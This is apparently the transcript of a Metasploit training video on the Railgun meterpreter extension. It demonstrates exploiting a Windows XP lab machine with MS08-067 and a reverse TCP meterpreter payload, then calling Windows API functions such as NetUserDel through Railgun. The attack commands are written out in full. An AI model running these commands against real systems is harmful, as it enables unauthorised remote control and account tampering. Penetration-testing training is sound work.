Hello, welcome to InsectX, Information Security Technologist training on penetration testing with Metasploit. In this video, we shall cover Railguns concept. So the agenda and the topics which we are going to cover in the Railguns. Introduction to Railgun basics, extending Railgun usage using Windows APIs, and basic introduction to DLLs, anatomy of functions, and calling the DLLs and the functions during the runtime. So now let's start with the Railguns, basic introduction to the Railguns. Let's say that after exploiting the machine, the attacker main intention is to how he can get more information. Okay, so basically for performing the post exploitation over the Windows machine, or else to extend the attack over the Windows machine, Railguns will help the attacker. Okay, in most of the scenarios. Best example is, if you want to access more functions, the other thing is that you need to define them within the framework console. Okay, so if it is not defined means you cannot leverage the information, right? So by using the Railguns, you can easily get the info whatever it is required, and all we need to do is, if it is defined means we just need to call it, if it is not present means we just need to add it. So that's it. Okay, so now let's start with the basic introduction. So what exactly Railgun is? Railgun is basically a meter-preter extension which allows attacker to run any kind of DLS, maybe which is present within the framework console, okay, which helps attackers to run it, or else even the attacker can add his own one. Okay, and this allows arbitrary reloading of various DLLs. And we all know that the Windows operating system is known for its own DLLs, right? Okay, so what the attacker can do is he can load any kind of DLL which he requires. Okay, all he need to do is he need to load this particular IRB shell over the meter-preter extensions. So this particular Railgun gives the flexibility and power to call different types of arbitrary functions in DLLs on the victim machine. So now let's go for the demonstration. So this is my Kali box, and I'm having a machine that is a Windows XP assigned with the IP 159.141. All I need to do is I need to compromise this target host, that is 141. Let me exploit the machine here by using net API, use exploit Windows assembly MS0867, and let me set the payload is an optional. Okay, set payload Windows meter-preter reverse underscore TCP, and set lhost 192.168.159.134, set rhost 192.168.159.141, and now exploit the machine. So it is about to trigger the vulnerability, and finally we got the machine. So what I said to here is what exactly the Railgun. Railgun is nothing but it's an extension for the meter-preter. So now let's load this. Just you need to issue IRB and hit enter, and now we are in this extension. And even before that, I'll show you the current process. Let us figure out the list of processes which are running. Okay, so you can see these are the list of processes which are running. Get PID. So this is the current process ID where the attacker is residing. And okay, now what we will do is we shall try to interact with the IRB here. So I just typed IRB. So previously we came to know that the current process ID where the attacker is residing here is, that is 1040, that is 1040. So now let's add a function. Okay, now let us call a function by using the Railgun. So all you need to do here is you need to type client.railgun.sys.process.get PID. Oops, I think I made a typo. Client.sys. Sorry, it's sys. Okay, sys dot process dot get PID. So the process here is 1040 because this particular function is defined. Okay, this particular function is defined. Even there is other command called get UID. Okay, so let's issue the following one. If it is present means it shows the current user ID, maybe NT authority or else administrator. Okay, so if it is not present means it throws a error. Okay, so let's issue this, and you can see that it's not there. Okay, it is, that means it is not yet defined, right? So what we can do is we can define the functions over the IRB, or else we can define the functions within the directory where it is all these functions have been defined. To locate the following directory, all you need to do is you need to type the locate and the directory, that is locate space railgun. So this shows you the path. Okay, so this is the path for the railgun directory. Let us navigate into this, and if you go to the def, so you can see different types of functions have been defined here with type of DLL. Okay, so now let's navigate into the following one. Let me use an editor Vim. You can use anyone, that's up to you. You can see here there is a function over here, right? DLL dot add function net user del. So what this DLL will do is it just deletes the user. Okay, if you want to change the password or else if you want to add a user, okay, you can add these things maybe during the runtime or else within the following script itself. Okay, that is up to you. So this is the basic introduction to the Railguns. So in the upcoming videos, what we will do is we shall add our own functions during the runtime, and even our own DLLs during the runtime, and even within the defined functions itself. Okay, got it? That's all for this video. Thanks for watching.